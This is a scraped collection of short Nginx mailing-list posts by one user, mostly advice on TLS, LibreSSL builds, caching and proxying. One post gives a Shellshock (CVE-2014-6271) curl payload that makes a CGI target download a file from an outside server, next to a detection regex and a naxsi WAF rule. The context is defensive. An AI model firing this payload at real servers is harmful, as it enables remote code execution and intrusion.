it is more a performance- than a security-issue (diskspace, i/o, buffering) etcby mex - Nginx Mailing List - English
did you tried server_name _; already? did you chained the certs for a.com / c.com in the correct order? see http://nginx.org/en/docs/http/configuring_https_servers.html / An SSL certificate with several namesby mex - Nginx Mailing List - English
i dont know of an out-of-the-box-solution, bit this might point into the right direction: - https://github.com/yaoweibin/nginx_tcp_proxy_module - http://stackoverflow.com/questions/5337122/is-it-possible-to-forward-non-http-connecting-request-to-some-other-port-in-ngin cheers, mexby mex - Nginx Mailing List - English
btw, it seems impossible to have ... ssl_protocols TLSv1.2; ... and a testresult of SSLv2 NOT offered (ok) SSLv3 offered TLSv1 not offered TLSv1.1 not offered TLSv1.2 not offered are you sure you have tested the right machine? i'd suggest you run the testssl.sh - script against https://localhost:443 on the machine where you build nginx. iirc, openssl 1.0.1e should be ableby mex - Nginx Mailing List - English
this probably depends on the underlaying openssl-version from your os. what does 'openssl version' says? if you want nginx with newer openssl-version you can build a custom nginx witth openssl statically linked https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#workaround-for-outdated-openssl-versions regards, mexby mex - Nginx Mailing List - English
curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O /tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi :D if, you should try to match for (regex-pattern) "\(\) {" #since this must be written like this; an additional space between "() {" would render the exploiut non-functional further more: you are missing all headers; attacby mex - Nginx Mailing List - English
hi pekka, since the attack, esp. against CGI, is possible through (custom) headers/cookies etc you'd need some waf-functionalities (afaik) naxsi, an nginx-based waf, has a signature for this since wednesday MainRule "str:() {" "msg:Possible Remote code execution through Bash CVE-2014-6271" "mz:BODY|HEADERS" "s:$ATTACK:8" id:42000393 ; htby mex - Nginx Mailing List - English
foo ... http://www.openwall.com/lists/oss-security/2014/09/24/17 "Note that on Linux systems where /bin/sh is symlinked to /bin/bash, any popen() / system() calls from within languages such as PHP would be of concern due to the ability to control HTTP_* in the env. /mz" $ ls -la /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash phew ':)by mex - Nginx Mailing List - English
hi list, the following bug (Remote code execution through bash) http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ **might** affect you if you use a shell/bash - based fcgi-wrapper like in the following receipt: http://wiki.nginx.org/Fcgiwrap / http://wiki.nginx.org/FcgiwrapDebianInitScript (did not tested it); if someone runs a shell-based cgiby mex - Nginx Mailing List - English
can you post your config please? beside this, is there a reason you stick to AJP-connector? iirc this is not a default-module for nginx, and on my testing i found the HTTP-connector as fast as AJP, but working kind of smoother for tomcat-appservers regards, mexby mex - Nginx Mailing List - English
Piotr Sikora Wrote: ------------------------------------------------------- > Hey, > > > # Summary > > > > It works. > > ....only with versions older than nginx-1.7.0, you need a small patch > (attached) in order to compile nginx-mainline against LibreSSL, > because LibreSSL developers decided that LibreSSL is OpenSSL-2.0.0... > I didn't send thiby mex - Nginx Mailing List - English
updated: static version and new perftests included https://www.mare-system.de/blog/page/1405201517/ regards, mexby mex - Nginx Mailing List - English
> > Just a quick comment: OpenSSL's libs under ".openssl/" isn't a > result of OpenSSL's behaviour, but rather a result of "make > install" nginx calls (and the ".openssl" install prefix it > instructs OpenSSL to use). > maybe we can have a --with-libressl=/path/to/libressl or something more generic soon? i think libressl/boringssl arby mex - Nginx Mailing List - English
> I think the cleanest solution would be if the backend could receive 1 > request and just split the content/response into chunks and send > what's > immediately available (html head + perhaps page header as well) as > first > chunk and send the rest afterwards. sounds tricky ... i must admit, i am not **that** deep into nginx-internals to say if nginx does this alreadyby mex - Nginx Mailing List - English
> Ok, I haven't done anything with nginx+lua so far, need to check out > what > can be done with lua. Can you give some direction how lua can be > helpful here? oh ... lua might be used to manipulate every single phase of a request coming to and processed by nginx; so a swiss army knife super-extended version :) some stuff to skim through to get an impression: - https:/by mex - Nginx Mailing List - English
sounds more like a custom solution that might be achieved using lua + nginx; from what i understand you have a "static" part that should get send early/from cache and a "dynamic" part that must wait for the backend? the only solution i could think of in such an asynchronous delivery is using nginx + lua, or maybe varnish (iirc you yould mark parts of a page cacheablby mex - Nginx Mailing List - English
https://www.mare-system.de/blog/page/1405201517/ # Summary It works. While it is not recommended to substitude OpenSSL with LibreSSL in this early stage, i wanted to test if it is possible. And it is. There are no functional or performance-issues, as far as i can test, and building nginx + libressl is easy, once you figured out how to do it. The advantages of using LibreSSL in the long ruby mex - Nginx Mailing List - English
according to w3techs, nginx is now #1 on the top 1000 list of websites and according to some perftests we did on our side, 1.6.0 seems to be 10% faster than 1.4; WELL DONE, nginx-team, and thanx for all the support http://w3techs.com/technologies/cross/web_server/ranking lyrics somewhat unrelated, but i found the dancing-part amusing :D https://www.youtube.com/watch?v=7xO-yEaiFoQby mex - Nginx Mailing List - English
depending on your setup you might think about serving static content and videos directly from nginx: http://www.nginxtips.com/optimizing-nginx-for-video-sites/ anything served directly from nginx, not going to apache will boost your performance. > Mex, That's a high amount of reduction in load-avg than :). Could you > please refer me to some guide to start with nginx-cache ?by mex - Nginx Mailing List - English
if the content is cacheable, using varnish or nginx-cache will definetely reduce load. we have a similar setup (nginx infront of apache+php) with an average of 5000 requests/second, and using nginx-cache with a cache-time of 1 minute reduced load from around 8 to 0.5 on the apache-servers, while the nginx-servers are still idleing at around 0.2 we use to nginx to cache static content as wby mex - Nginx Mailing List - English
if your site is silviosiefke.com, there is no tls-service available on port 443 can you please paste the output of nginx -t / nginx -V ? ######################################################## testssl.sh v2.0rc2 (https://testssl.sh) ######################################################## Using "OpenSSL 1.0.1g 7 Apr 2014" on On port 443 @ silviosiefke.com seems aby mex - Nginx Mailing List - English
maybe you should capture the traffic with wireshark to see which party sends what packet in which order. regrads, mexby mex - Nginx Mailing List - English
> Hence I have to place nginx before apache without disturbing the > setup. > works seemlessly and speeds up your apache, when using proxy_cache, assuming your apache listens on 8080 server { listen 80; server_name myhost; location / { root /path/to/myapp/public; proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host;by mex - Nginx Mailing List - English
> Can anyone tell my what thebenefits are ( apart from .htaccess > support, > which I see all too often as a curse ) why anyone would do this in > preference to just using a pure nginx solution? > - out-of-the-box running stuff like mod_php / suphp - excessive use of rewite-rules in .htacces to make urls look like REST-like (typo3) - well tested environmentsby mex - Nginx Mailing List - English
you should make your apache listen on 127.0.0.1:80 and nginx on your external IP:80 (443 if you need ssl) did you checked the manuals in wthe wiki? http://wiki.nginx.org/Configuration -> proxying examples http://wiki.nginx.org/LikeApache-> all you need for a start after this you should check proxy_cache and different location {} - setups for your static files.by mex - Nginx Mailing List - English
hi, what is your os (name and version)? where do you have the ciphers from bwt? i'd suggest you test the tls-version yourself with testssl.sh https://bitbucket.org/nginx-goodies/testssl.sh (note: you need a current openssl-version on the machine you test from) regards, mexby mex - Nginx Mailing List - English
hi robert, if you dont depend on mod_security's advanced features like output-filtering'n'stuff you might want to try naxsi https://github.com/nbs-system/naxsi/wiki its stable, its fast, rules are easy to create and understand and it provides a set of basic features for a waf. the community is responsive and open for feature-requests or bugreports. regards, mexby mex - Nginx Mailing List - English
i'm seen the question below on nginx-dev from september last year, http://forum.nginx.org/read.php?29,243031,243031#msg-243031 I've seen some attempts to use polarssl one year ago and would like to restart delevopment in that direction, so i'd like to re-issue this question from Aleksandar Lazic: ------------------------------------------------ Are there any plans to add another Sby mex - Nginx Mailing List - English
do you have tryfiles enabled? i'd try this to check, if the request reaches the nright location-block location ^~ /card/ { ... access_log /var/log/nginx/cards.log combined; ... } if so, your must look inside your locatiuon, if not, somwhere else regards, mexby mex - Nginx Mailing List - English